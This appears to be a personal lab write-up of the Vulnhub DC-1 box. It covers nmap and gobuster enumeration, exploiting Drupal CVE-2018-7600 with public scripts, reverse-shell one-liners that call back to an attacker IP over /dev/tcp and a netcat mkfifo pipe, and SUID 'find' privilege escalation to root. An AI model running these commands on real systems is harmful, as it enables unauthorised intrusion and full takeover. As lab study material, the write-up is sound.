👁️DC1
DC1 - 192.168.235.193
//nmap -sCV -p- -A --min-rate 10000 192.168.116.193
The NMAP output shows us that there are 3 ports open: 22(SSH), 80(HTTP), 111(RPC)
We find that port 80 is running http, so we open the IP in our browser.
Enumerate using port 80
gobuster dir -u http://192.168.235.193/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -b 404,401 -x php,asp,js,txt,html
Droopescan
Since Nmap showed a Drupal website on port 80, I ran Droopescan. A tool to get specific information about Drupal instances such as identifying versions or listing installed themes and plugins.
# Target Identification
droopescan scan drupal -u example.org
droopescan scan drupal -U list_of_urls.txt
# You can also ommit the drupal argument, so it will trigger the cms identification
droopescan scan -u example.org
droopescan scan -U list_of_urls.txt
Exploiting Using Python
https://ine.com/blog/cve-2018-7600-drupalgeddon-2
https://www.exploit-db.com/exploits/46459
Python3 exploit.py http://192.168.100.154:8081/ “id”
Python3 46459.py http://192.168.116.193/ “id”
echo 'bash -c 'exec bash -i &>/dev/tcp/192.168.45.185/4242 <&1' | base64
bash%20-c%20'exec%20bash%20-i%20&%3E/dev/tcp/192.168.45.185/4242%20%3C&1'
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
After researching this exploitation, I found a great tool on GITHUB called “Drupal 7 (CVE-2018-7600 / SA-CORE-2018-002) by PIMPS”. By poisoning the recover password form (user/password) and triggering it with a file upload via ajax (/file/ajax), this exploitation allows us to perform REMOTE CODE EXECUTION.As I executed the exploit against the system, here are the outputs:
python drupa7-CVE-2018-7600.py http://192.168.116.193/ -c 'cat /etc/passwd'
python drupa7-CVE-2018-7600.py http://192.168.116.193/ -c ls
This is good, now let’s get a reverse-shell. Check with the fellows at PENTEST Monkey Cheatsheet. Guess who found one that work. THIS GUY.
'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.185 1234 >/tmp/f'
python drupa7-CVE-2018-7600.py http://192.168.116.193/ -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.185 1234 >/tmp/f'
Run the below command in attacker machine
nc -nvlp 1234
After getting a reverse shell we spawn a TTY shell using python. Then we find a file with suid permission on the server and find that the “find” command has SUID bit set.
python -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null
Privilege Escalation
Some of the things I checked were
• cat /etc/passwd users on the machine
• ls -la /etc/* odd services or permissions (files writeable by everyone or not owned by root)
• ls -la /home user’s data, one existed called flag4
• ps aux | grep root root services
• netstat -antup local ports running services only for localhost
This is when S1ren reviewed SUID and GUID escalations. SUIDs is where calling a command as a low level user changes the active permissions to the root users. Some commands allow options that can be used to execute other commands like spawning a new shell session. The command to search for SUIDs is find / -perm -u=s -type f 2>/dev/null
• find: the command we’re using to search
• /: search in the base directory
• -perm -u=s: permissions for SUID
• -type f: search for files only
• 2>/dev/null: redirect errors to “null” (don’t display errors)
Running find we see there are 18 programs with the permission we want to review. For new hackers, we can use GTFObins to learn about each of the programs that might spawn a new root shell. With experience this will be a faster process.
GTFObins shows that find can also be used to spawn a new root shell. Pasting from the website into our www-data shell I got multiple errors. Passing the -p parameter also made me close the www-data shell.
/usr/bin/find
./find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
sudo /usr/bin/find . -exec /bin/sh \; -quit
python -c 'import pty; pty.spawn("/bin/bash")'
find . -exec /bin/sh \; -quit
Going back to the POST EXPLOIT recon data gather earlier and performing a few trials of other kernel exploits which failed, we find a file with SUID permission on the server and find that the “find” command has SUID bit set. Therefore allowing us to used the find command as root privilege due to the sticky bit that is set (as root). Further search confirm it as shown below.
find / -perm -u=s -type f 2>/dev/null
My research uncovered this great article about Abusing SUDO (Linux Privilege Escalation) by Touhid Shaikh which explained the process and why it works. Getting a better understanding of this process, maybe the PRIVESC is not so hard. Here is the PRIVESC for this box. With one line of command line kungfu we were able to get ROOT.
https://touhidshaikh.com/
find /bin -name nano -exec /bin/sh \;
https://infosecwriteups.com/vulnhub-writeup-dc-1-37dcf92b456a
Another way
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/?source=post_page-----37dcf92b456a--------------------------------
ls /root gives us the Permission denied but with the help of find /root we can see the files.
$find /root/thefinalflag.txt -exec cat {} \;
$find /root/thefinalflag.txt -exec /bin/sh \;
Last updated
Was this helpful?